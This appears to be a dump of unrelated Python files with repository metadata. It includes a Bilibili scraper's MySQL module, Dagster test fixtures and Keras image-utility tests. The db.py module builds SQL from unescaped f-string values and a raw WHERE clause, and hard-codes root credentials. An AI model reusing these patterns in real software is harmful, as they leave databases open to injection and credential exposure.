if hasattr(resource[type], 'groupingObjectId'):
firewall_rule_source_destination['groupingObjectId'] = [
groupingObjectId
for groupingObjectId in resource[type].groupingObjectId
]
return firewall_rule_source_destination
def _build_firewall_rules_href(self):
return self.network_url + FIREWALL_URL_TEMPLATE
def update_firewall_rule_sequence(self, index):
index = int(index)
gateway_res = Gateway(self.client, resource=self.parent)
firewall_rule = gateway_res.get_firewall_rules()
resource = self._get_resource()
for rule in firewall_rule.firewallRules.firewallRule:
if rule.id == resource.id:
firewall_rule.firewallRules.remove(rule)
firewall_rule.firewallRules.insert(index, rule)
break
return self.client.put_resource(self._build_firewall_rules_href(),
firewall_rule,
EntityType.DEFAULT_CONTENT_TYPE.value)
def delete_firewall_rule_source_destination(self, value, type):
resource = self._get_resource()
if hasattr(resource, type):
for object in resource[type].iter():
if object == value:
resource[type].remove(object)
return self.client.put_resource(self.href, resource,
EntityType.DEFAULT_CONTENT_TYPE.value)
| true
| true
|
f70b54bcca7c78b8d17ea7a455504224546fdeca
| 2,474
|
py
|
Python
|
network/db.py
|
LincZero/BiliTools
|
334190da7f6407fc85b20ff6d126a3dcd16505ab
|
[
"Apache-2.0"
] | null | null | null |
network/db.py
|
LincZero/BiliTools
|
334190da7f6407fc85b20ff6d126a3dcd16505ab
|
[
"Apache-2.0"
] | null | null | null |
network/db.py
|
LincZero/BiliTools
|
334190da7f6407fc85b20ff6d126a3dcd16505ab
|
[
"Apache-2.0"
] | null | null | null |
import MySQLdb
from biliClass.biliAid import Aid
import time
def dblink(): # 连接数据库
# demo
return MySQLdb.connect(
host='localhost',
user='root',
passwd='password',
db='nav',
charset='utf8'
)
def dbsql(conn, sql): # 执行sql
cursor = conn.cursor()
cursor.execute(sql)
return cursor
def dbclose(cursor, conn): # 关闭sql与游标
cursor.close()
conn.commit() # 好像不用这句也行?
conn.close()
def insert(title, av_list): # 插入av用,一次性插入
conn = dblink()
sql = """INSERT IGNORE INTO `nav_bili_v`
(`id`, `av`, `bv`, `class`, `title`, `pic`, `descript`, `dynamic`, `o_name`, `o_face`, `s_view`, `s_danmaku`, `s_reply`, `s_like`, `s_coin`, `s_favorite`, `s_share`, `s_time`, `up`)
VALUES """
try:
for av in av_list:
sql += f"""(NULL, '{av}', NULL, '{title}', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),"""
sql = sql[:-1]+';' # python-str不可修改,这里是重赋值
cursor = dbsql(conn, sql)
dbclose(cursor, conn)
print('【log: 插入成功】')
except:
print('【log: 插入失败】')
def read(where=''): # 读取数据库
if(where!=''):
where = 'WHERE ' + where
conn = dblink()
sql = f"""SELECT * FROM `nav_bili_v` {where}"""
cursor = dbsql(conn, sql)
s = ''
for row in cursor.fetchall():
s = s + str(row) + '\n'
dbclose(cursor, conn)
return s
def autoUpdata(where=''):
if(where!=''):
where1 = 'WHERE ' + where
where2 = 'AND ' + where
conn = dblink()
# 第一次处理sql语句 - 读取av列表
sql_r = f"""SELECT * FROM `nav_bili_v` {where1}"""
cursor = dbsql(conn, sql_r)
av_list = cursor.fetchall()
# 仅关闭游标以更新
cursor.close()
# 第二次处理sql语句 - 爬取信息并更新列表
i = 0
for row in av_list[:]:
av = row[1]
try:
dic = Aid(av).dic
time.sleep(0.3) # 友善爬虫 && 防止被封ip
sql_u = """UPDATE `nav_bili_v` """
sql_u_temp = 'SET '
for value in dic.values():
for k,v in value.items():
sql_u_temp += f"`{k}`='{v[1]}',"
sql_u_temp = f'''{sql_u_temp[:-1]} WHERE `av`={av} {where2}'''
sql_u += sql_u_temp
cursor = dbsql(conn, sql_u)
print(f'[序列{i}] av:{av} 数据更新完毕')
except:
print(f'[序列{i}] av:{av} 数据更新失败!!!!!!!!!!!')
i+=1
print('\n数据表全部数据更新完毕')
dbclose(cursor, conn)
| 27.186813
| 185
| 0.516168
|
import MySQLdb
from biliClass.biliAid import Aid
import time
def dblink():
return MySQLdb.connect(
host='localhost',
user='root',
passwd='password',
db='nav',
charset='utf8'
)
def dbsql(conn, sql):
cursor = conn.cursor()
cursor.execute(sql)
return cursor
def dbclose(cursor, conn):
cursor.close()
conn.commit()
conn.close()
def insert(title, av_list):
conn = dblink()
sql = """INSERT IGNORE INTO `nav_bili_v`
(`id`, `av`, `bv`, `class`, `title`, `pic`, `descript`, `dynamic`, `o_name`, `o_face`, `s_view`, `s_danmaku`, `s_reply`, `s_like`, `s_coin`, `s_favorite`, `s_share`, `s_time`, `up`)
VALUES """
try:
for av in av_list:
sql += f"""(NULL, '{av}', NULL, '{title}', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),"""
sql = sql[:-1]+';'
cursor = dbsql(conn, sql)
dbclose(cursor, conn)
print('【log: 插入成功】')
except:
print('【log: 插入失败】')
def read(where=''):
if(where!=''):
where = 'WHERE ' + where
conn = dblink()
sql = f"""SELECT * FROM `nav_bili_v` {where}"""
cursor = dbsql(conn, sql)
s = ''
for row in cursor.fetchall():
s = s + str(row) + '\n'
dbclose(cursor, conn)
return s
def autoUpdata(where=''):
if(where!=''):
where1 = 'WHERE ' + where
where2 = 'AND ' + where
conn = dblink()
sql_r = f"""SELECT * FROM `nav_bili_v` {where1}"""
cursor = dbsql(conn, sql_r)
av_list = cursor.fetchall()
cursor.close()
i = 0
for row in av_list[:]:
av = row[1]
try:
dic = Aid(av).dic
time.sleep(0.3)
sql_u = """UPDATE `nav_bili_v` """
sql_u_temp = 'SET '
for value in dic.values():
for k,v in value.items():
sql_u_temp += f"`{k}`='{v[1]}',"
sql_u_temp = f'''{sql_u_temp[:-1]} WHERE `av`={av} {where2}'''
sql_u += sql_u_temp
cursor = dbsql(conn, sql_u)
print(f'[序列{i}] av:{av} 数据更新完毕')
except:
print(f'[序列{i}] av:{av} 数据更新失败!!!!!!!!!!!')
i+=1
print('\n数据表全部数据更新完毕')
dbclose(cursor, conn)
| true
| true
|
f70b569498b82d470320a1d9546d114427f688b4
| 695
|
py
|
Python
|
cinderclient/v3/qos_specs.py
|
deepanshhu/python-cinderclient
|
2c0f74c708fd09c5ae813255aaa671073f2fe250
|
[
"Apache-1.1"
] | null | null | null |
cinderclient/v3/qos_specs.py
|
deepanshhu/python-cinderclient
|
2c0f74c708fd09c5ae813255aaa671073f2fe250
|
[
"Apache-1.1"
] | null | null | null |
cinderclient/v3/qos_specs.py
|
deepanshhu/python-cinderclient
|
2c0f74c708fd09c5ae813255aaa671073f2fe250
|
[
"Apache-1.1"
] | null | null | null |
# Copyright (c) 2013 eBay Inc.
# Copyright (c) OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
QoS Specs interface.
"""
from cinderclient.v2.qos_specs import * # noqa
| 30.217391
| 69
| 0.748201
|
from cinderclient.v2.qos_specs import *
| true
| true
|
f70b5953932541c87b991bde53d94cc13d35e857
| 36
|
py
|
Python
|
tests/__init__.py
|
quarkslab/ziphyr
|
f4b6f258b88ed5b4c8c1e0557ddd01e63f225407
|
[
"Apache-2.0"
] | 3
|
2020-12-13T10:52:50.000Z
|
2021-11-15T10:45:00.000Z
|
tests/__init__.py
|
quarkslab/ziphyr
|
f4b6f258b88ed5b4c8c1e0557ddd01e63f225407
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
quarkslab/ziphyr
|
f4b6f258b88ed5b4c8c1e0557ddd01e63f225407
|
[
"Apache-2.0"
] | 1
|
2021-11-14T02:56:49.000Z
|
2021-11-14T02:56:49.000Z
|
"""Unit test package for ziphyr."""
| 18
| 35
| 0.666667
| true
| true
|
|
f70b5a26a5001b76af41aed307f2de5fb84a932a
| 3,490
|
py
|
Python
|
python_modules/dagster/dagster_tests/conftest.py
|
johannkm/dagster-okteto
|
7ad30528a4a92945967d68e59e27727a1e839c2b
|
[
"Apache-2.0"
] | 1
|
2020-08-10T23:03:37.000Z
|
2020-08-10T23:03:37.000Z
|
python_modules/dagster/dagster_tests/conftest.py
|
johannkm/dagster-okteto
|
7ad30528a4a92945967d68e59e27727a1e839c2b
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster_tests/conftest.py
|
johannkm/dagster-okteto
|
7ad30528a4a92945967d68e59e27727a1e839c2b
|
[
"Apache-2.0"
] | 1
|
2020-08-20T14:20:31.000Z
|
2020-08-20T14:20:31.000Z
|
import os
import subprocess
import time
from contextlib import contextmanager
import grpc
import pytest
from dagster_test.dagster_core_docker_buildkite import (
build_and_tag_test_image,
test_project_docker_image,
)
from dagster import check
from dagster.grpc.client import DagsterGrpcClient
from dagster.utils import file_relative_path
IS_BUILDKITE = os.getenv('BUILDKITE') is not None
HARDCODED_PORT = 8090
@pytest.fixture(scope='session')
def dagster_docker_image():
docker_image = test_project_docker_image()
if not IS_BUILDKITE:
# Being conservative here when first introducing this. This could fail
# if the Docker daemon is not running, so for now we just skip the tests using this
# fixture if the build fails, and warn with the output from the build command
try:
build_and_tag_test_image(docker_image)
except subprocess.CalledProcessError as exc_info:
pytest.skip(
"Skipped container tests due to a failure when trying to build the image. "
"Most likely, the docker deamon is not running.\n"
"Output:\n{}".format(exc_info.output.decode())
)
return docker_image
def wait_for_connection(host, port):
retry_limit = 20
while retry_limit:
try:
if DagsterGrpcClient(host=host, port=port).ping("ready") == "ready":
return True
except grpc.RpcError:
pass
time.sleep(0.2)
retry_limit -= 1
pytest.skip(
"Skipped grpc container tests due to a failure when trying to connect to the GRPC server "
"at {host}:{port}'.format(host=host, port=port)"
)
@contextmanager
def docker_service_up(docker_compose_file, service_name):
check.str_param(service_name, 'service_name')
check.str_param(docker_compose_file, 'docker_compose_file')
check.invariant(
os.path.isfile(docker_compose_file), 'docker_compose_file must specify a valid file'
)
if not IS_BUILDKITE:
env = os.environ.copy()
env["IMAGE_NAME"] = test_project_docker_image()
try:
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'stop', service_name], env=env,
)
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'rm', '-f', service_name], env=env,
)
except Exception: # pylint: disable=broad-except
pass
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'up', '-d', service_name], env=env,
)
yield
@pytest.fixture(scope='session')
def grpc_host():
# In buildkite we get the ip address from this variable (see buildkite code for commentary)
# Otherwise assume local development and assume localhost
env_name = 'GRPC_SERVER_HOST'
if env_name not in os.environ:
os.environ[env_name] = 'localhost'
return os.environ[env_name]
@pytest.fixture(scope='session')
def grpc_port():
yield HARDCODED_PORT
@pytest.fixture(scope='session')
def docker_grpc_client(
dagster_docker_image, grpc_host, grpc_port
): # pylint: disable=redefined-outer-name, unused-argument
if not IS_BUILDKITE:
docker_service_up(file_relative_path(__file__, 'docker-compose.yml'), 'dagster-grpc-server')
wait_for_connection(grpc_host, grpc_port)
yield DagsterGrpcClient(port=grpc_port, host=grpc_host)
| 30.884956
| 100
| 0.67851
|
import os
import subprocess
import time
from contextlib import contextmanager
import grpc
import pytest
from dagster_test.dagster_core_docker_buildkite import (
build_and_tag_test_image,
test_project_docker_image,
)
from dagster import check
from dagster.grpc.client import DagsterGrpcClient
from dagster.utils import file_relative_path
IS_BUILDKITE = os.getenv('BUILDKITE') is not None
HARDCODED_PORT = 8090
@pytest.fixture(scope='session')
def dagster_docker_image():
docker_image = test_project_docker_image()
if not IS_BUILDKITE:
try:
build_and_tag_test_image(docker_image)
except subprocess.CalledProcessError as exc_info:
pytest.skip(
"Skipped container tests due to a failure when trying to build the image. "
"Most likely, the docker deamon is not running.\n"
"Output:\n{}".format(exc_info.output.decode())
)
return docker_image
def wait_for_connection(host, port):
retry_limit = 20
while retry_limit:
try:
if DagsterGrpcClient(host=host, port=port).ping("ready") == "ready":
return True
except grpc.RpcError:
pass
time.sleep(0.2)
retry_limit -= 1
pytest.skip(
"Skipped grpc container tests due to a failure when trying to connect to the GRPC server "
"at {host}:{port}'.format(host=host, port=port)"
)
@contextmanager
def docker_service_up(docker_compose_file, service_name):
check.str_param(service_name, 'service_name')
check.str_param(docker_compose_file, 'docker_compose_file')
check.invariant(
os.path.isfile(docker_compose_file), 'docker_compose_file must specify a valid file'
)
if not IS_BUILDKITE:
env = os.environ.copy()
env["IMAGE_NAME"] = test_project_docker_image()
try:
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'stop', service_name], env=env,
)
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'rm', '-f', service_name], env=env,
)
except Exception: # pylint: disable=broad-except
pass
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'up', '-d', service_name], env=env,
)
yield
@pytest.fixture(scope='session')
def grpc_host():
# In buildkite we get the ip address from this variable (see buildkite code for commentary)
# Otherwise assume local development and assume localhost
env_name = 'GRPC_SERVER_HOST'
if env_name not in os.environ:
os.environ[env_name] = 'localhost'
return os.environ[env_name]
@pytest.fixture(scope='session')
def grpc_port():
yield HARDCODED_PORT
@pytest.fixture(scope='session')
def docker_grpc_client(
dagster_docker_image, grpc_host, grpc_port
): # pylint: disable=redefined-outer-name, unused-argument
if not IS_BUILDKITE:
docker_service_up(file_relative_path(__file__, 'docker-compose.yml'), 'dagster-grpc-server')
wait_for_connection(grpc_host, grpc_port)
yield DagsterGrpcClient(port=grpc_port, host=grpc_host)
| true
| true
|
f70b5aa7ce7c85310bc3393804622e2a327dc477
| 16,705
|
py
|
Python
|
tests/image/utils_test.py
|
ayman3000/keras-preprocessing
|
845c423e01acfe251d4276e52cf2b86e73f1646a
|
[
"MIT"
] | 1,071
|
2018-05-30T23:04:13.000Z
|
2022-03-23T08:50:10.000Z
|
tests/image/utils_test.py
|
ayman3000/keras-preprocessing
|
845c423e01acfe251d4276e52cf2b86e73f1646a
|
[
"MIT"
] | 286
|
2018-05-31T14:17:50.000Z
|
2022-03-31T10:13:57.000Z
|
tests/image/utils_test.py
|
ayman3000/keras-preprocessing
|
845c423e01acfe251d4276e52cf2b86e73f1646a
|
[
"MIT"
] | 529
|
2018-05-30T23:21:34.000Z
|
2022-03-08T19:11:06.000Z
|
import io
import resource
from pathlib import Path
import numpy as np
import PIL
import pytest
from keras_preprocessing.image import utils
def test_validate_filename(tmpdir):
valid_extensions = ('png', 'jpg')
filename = tmpdir.ensure('test.png')
assert utils.validate_filename(str(filename), valid_extensions)
filename = tmpdir.ensure('test.PnG')
assert utils.validate_filename(str(filename), valid_extensions)
filename = tmpdir.ensure('test.some_extension')
assert not utils.validate_filename(str(filename), valid_extensions)
assert not utils.validate_filename('some_test_file.png', valid_extensions)
def test_load_img(tmpdir):
filename_rgb = str(tmpdir / 'rgb_utils.png')
filename_rgba = str(tmpdir / 'rgba_utils.png')
filename_grayscale_8bit = str(tmpdir / 'grayscale_8bit_utils.png')
filename_grayscale_16bit = str(tmpdir / 'grayscale_16bit_utils.tiff')
filename_grayscale_32bit = str(tmpdir / 'grayscale_32bit_utils.tiff')
original_rgb_array = np.array(255 * np.random.rand(100, 100, 3),
dtype=np.uint8)
original_rgb = utils.array_to_img(original_rgb_array, scale=False)
original_rgb.save(filename_rgb)
original_rgba_array = np.array(255 * np.random.rand(100, 100, 4),
dtype=np.uint8)
original_rgba = utils.array_to_img(original_rgba_array, scale=False)
original_rgba.save(filename_rgba)
original_grayscale_8bit_array = np.array(255 * np.random.rand(100, 100, 1),
dtype=np.uint8)
original_grayscale_8bit = utils.array_to_img(original_grayscale_8bit_array,
scale=False)
original_grayscale_8bit.save(filename_grayscale_8bit)
original_grayscale_16bit_array = np.array(
np.random.randint(-2147483648, 2147483647, (100, 100, 1)), dtype=np.int16
)
original_grayscale_16bit = utils.array_to_img(original_grayscale_16bit_array,
scale=False, dtype='int16')
original_grayscale_16bit.save(filename_grayscale_16bit)
original_grayscale_32bit_array = np.array(
np.random.randint(-2147483648, 2147483647, (100, 100, 1)), dtype=np.int32
)
original_grayscale_32bit = utils.array_to_img(original_grayscale_32bit_array,
scale=False, dtype='int32')
original_grayscale_32bit.save(filename_grayscale_32bit)
# Test that loaded image is exactly equal to original.
loaded_im = utils.load_img(filename_rgb)
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgb_array.shape
assert np.all(loaded_im_array == original_rgb_array)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgba_array.shape
assert np.all(loaded_im_array == original_rgba_array)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (original_rgb_array.shape[0],
original_rgb_array.shape[1], 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_grayscale_8bit_array.shape
assert np.all(loaded_im_array == original_grayscale_8bit_array)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == original_grayscale_16bit_array.shape
assert np.all(loaded_im_array == original_grayscale_16bit_array)
# test casting int16 image to float32
loaded_im_array = utils.img_to_array(loaded_im)
assert np.allclose(loaded_im_array, original_grayscale_16bit_array)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == original_grayscale_32bit_array.shape
assert np.all(loaded_im_array == original_grayscale_32bit_array)
# test casting int32 image to float32
loaded_im_array = utils.img_to_array(loaded_im)
assert np.allclose(loaded_im_array, original_grayscale_32bit_array)
# Test that nothing is changed when target size is equal to original.
loaded_im = utils.load_img(filename_rgb, target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgb_array.shape
assert np.all(loaded_im_array == original_rgb_array)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgba_array.shape
assert np.all(loaded_im_array == original_rgba_array)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (original_rgba_array.shape[0],
original_rgba_array.shape[1], 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_grayscale_8bit_array.shape
assert np.all(loaded_im_array == original_grayscale_8bit_array)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == original_grayscale_16bit_array.shape
assert np.all(loaded_im_array == original_grayscale_16bit_array)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == original_grayscale_32bit_array.shape
assert np.all(loaded_im_array == original_grayscale_32bit_array)
# Test down-sampling with bilinear interpolation.
loaded_im = utils.load_img(filename_rgb, target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 3)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 4)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == (25, 25, 1)
# Test down-sampling with nearest neighbor interpolation.
loaded_im_nearest = utils.load_img(filename_rgb, target_size=(25, 25),
interpolation="nearest")
loaded_im_array_nearest = utils.img_to_array(loaded_im_nearest)
assert loaded_im_array_nearest.shape == (25, 25, 3)
assert np.any(loaded_im_array_nearest != loaded_im_array)
loaded_im_nearest = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(25, 25),
interpolation="nearest")
loaded_im_array_nearest = utils.img_to_array(loaded_im_nearest)
assert loaded_im_array_nearest.shape == (25, 25, 4)
assert np.any(loaded_im_array_nearest != loaded_im_array)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == (25, 25, 1)
# Test different path type
with open(filename_grayscale_32bit, 'rb') as f:
_path = io.BytesIO(f.read()) # io.Bytesio
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = filename_grayscale_32bit # str
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = filename_grayscale_32bit.encode() # bytes
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = Path(tmpdir / 'grayscale_32bit_utils.tiff') # Path
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
# Check that exception is raised if interpolation not supported.
loaded_im = utils.load_img(filename_rgb, interpolation="unsupported")
with pytest.raises(ValueError):
loaded_im = utils.load_img(filename_rgb, target_size=(25, 25),
interpolation="unsupported")
# Check that the aspect ratio of a square is the same
filename_red_square = str(tmpdir / 'red_square_utils.png')
A = np.zeros((50, 100, 3), dtype=np.uint8) # rectangle image 100x50
A[20:30, 45:55, 0] = 255 # red square 10x10
red_square_array = np.array(A)
red_square = utils.array_to_img(red_square_array, scale=False)
red_square.save(filename_red_square)
loaded_im = utils.load_img(filename_red_square, target_size=(25, 25),
keep_aspect_ratio=True)
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 3)
red_channel_arr = loaded_im_array[:, :, 0].astype(np.bool)
square_width = np.sum(np.sum(red_channel_arr, axis=0))
square_height = np.sum(np.sum(red_channel_arr, axis=1))
aspect_ratio_result = square_width / square_height
# original square had 1:1 ratio
assert aspect_ratio_result == pytest.approx(1.0)
def test_list_pictures(tmpdir):
filenames = ['test.png', 'test0.jpg', 'test-1.jpeg', '2test.bmp',
'2-test.ppm', '3.png', '1.jpeg', 'test.bmp', 'test0.ppm',
'test4.tiff', '5-test.tif', 'test.txt', 'foo.csv',
'face.gif', 'bar.txt']
subdirs = ['', 'subdir1', 'subdir2']
filenames = [tmpdir.ensure(subdir, f) for subdir in subdirs
for f in filenames]
found_images = utils.list_pictures(str(tmpdir))
assert len(found_images) == 33
found_images = utils.list_pictures(str(tmpdir), ext='png')
assert len(found_images) == 6
def test_array_to_img_and_img_to_array():
height, width = 10, 8
# Test the data format
# Test RGB 3D
x = np.random.random((3, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (3, height, width)
# Test RGBA 3D
x = np.random.random((4, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (4, height, width)
# Test 2D
x = np.random.random((1, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (1, height, width)
# grayscale 32-bit signed integer
x = np.array(
np.random.randint(-2147483648, 2147483647, (1, height, width)),
dtype=np.int32
)
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (1, height, width)
# Test tf data format
# Test RGB 3D
x = np.random.random((height, width, 3))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 3)
# Test RGBA 3D
x = np.random.random((height, width, 4))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 4)
# Test 2D
x = np.random.random((height, width, 1))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
# grayscale 16-bit signed integer
x = np.array(
np.random.randint(-2147483648, 2147483647, (height, width, 1)),
dtype=np.int16
)
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
# grayscale 32-bit signed integer
x = np.array(
np.random.randint(-2147483648, 2147483647, (height, width, 1)),
dtype=np.int32
)
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
# Test invalid use case
with pytest.raises(ValueError):
x = np.random.random((height, width)) # not 3D
img = utils.array_to_img(x, data_format='channels_first')
with pytest.raises(ValueError):
x = np.random.random((height, width, 3))
# unknown data_format
img = utils.array_to_img(x, data_format='channels')
with pytest.raises(ValueError):
# neither RGB, RGBA, or gray-scale
x = np.random.random((height, width, 5))
img = utils.array_to_img(x, data_format='channels_last')
with pytest.raises(ValueError):
x = np.random.random((height, width, 3))
# unknown data_format
img = utils.img_to_array(x, data_format='channels')
with pytest.raises(ValueError):
# neither RGB, RGBA, or gray-scale
x = np.random.random((height, width, 5, 3))
img = utils.img_to_array(x, data_format='channels_last')
def write_sample_image(tmpdir):
im = utils.array_to_img(np.random.rand(1, 1, 3))
path = str(tmpdir / 'sample_image.png')
utils.save_img(path, im)
return path
def test_image_file_handlers_close(tmpdir):
path = write_sample_image(tmpdir)
max_open_files, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
for i in range(max_open_files+1):
utils.load_img(path)
def test_load_img_returns_image(tmpdir):
path = write_sample_image(tmpdir)
im = utils.load_img(path)
assert isinstance(im, PIL.Image.Image)
if __name__ == '__main__':
pytest.main([__file__])
| 41.7625
| 81
| 0.685004
|
import io
import resource
from pathlib import Path
import numpy as np
import PIL
import pytest
from keras_preprocessing.image import utils
def test_validate_filename(tmpdir):
valid_extensions = ('png', 'jpg')
filename = tmpdir.ensure('test.png')
assert utils.validate_filename(str(filename), valid_extensions)
filename = tmpdir.ensure('test.PnG')
assert utils.validate_filename(str(filename), valid_extensions)
filename = tmpdir.ensure('test.some_extension')
assert not utils.validate_filename(str(filename), valid_extensions)
assert not utils.validate_filename('some_test_file.png', valid_extensions)
def test_load_img(tmpdir):
filename_rgb = str(tmpdir / 'rgb_utils.png')
filename_rgba = str(tmpdir / 'rgba_utils.png')
filename_grayscale_8bit = str(tmpdir / 'grayscale_8bit_utils.png')
filename_grayscale_16bit = str(tmpdir / 'grayscale_16bit_utils.tiff')
filename_grayscale_32bit = str(tmpdir / 'grayscale_32bit_utils.tiff')
original_rgb_array = np.array(255 * np.random.rand(100, 100, 3),
dtype=np.uint8)
original_rgb = utils.array_to_img(original_rgb_array, scale=False)
original_rgb.save(filename_rgb)
original_rgba_array = np.array(255 * np.random.rand(100, 100, 4),
dtype=np.uint8)
original_rgba = utils.array_to_img(original_rgba_array, scale=False)
original_rgba.save(filename_rgba)
original_grayscale_8bit_array = np.array(255 * np.random.rand(100, 100, 1),
dtype=np.uint8)
original_grayscale_8bit = utils.array_to_img(original_grayscale_8bit_array,
scale=False)
original_grayscale_8bit.save(filename_grayscale_8bit)
original_grayscale_16bit_array = np.array(
np.random.randint(-2147483648, 2147483647, (100, 100, 1)), dtype=np.int16
)
original_grayscale_16bit = utils.array_to_img(original_grayscale_16bit_array,
scale=False, dtype='int16')
original_grayscale_16bit.save(filename_grayscale_16bit)
original_grayscale_32bit_array = np.array(
np.random.randint(-2147483648, 2147483647, (100, 100, 1)), dtype=np.int32
)
original_grayscale_32bit = utils.array_to_img(original_grayscale_32bit_array,
scale=False, dtype='int32')
original_grayscale_32bit.save(filename_grayscale_32bit)
loaded_im = utils.load_img(filename_rgb)
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgb_array.shape
assert np.all(loaded_im_array == original_rgb_array)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba')
loaded_im_array = utils.img_to_array(loaded_im)
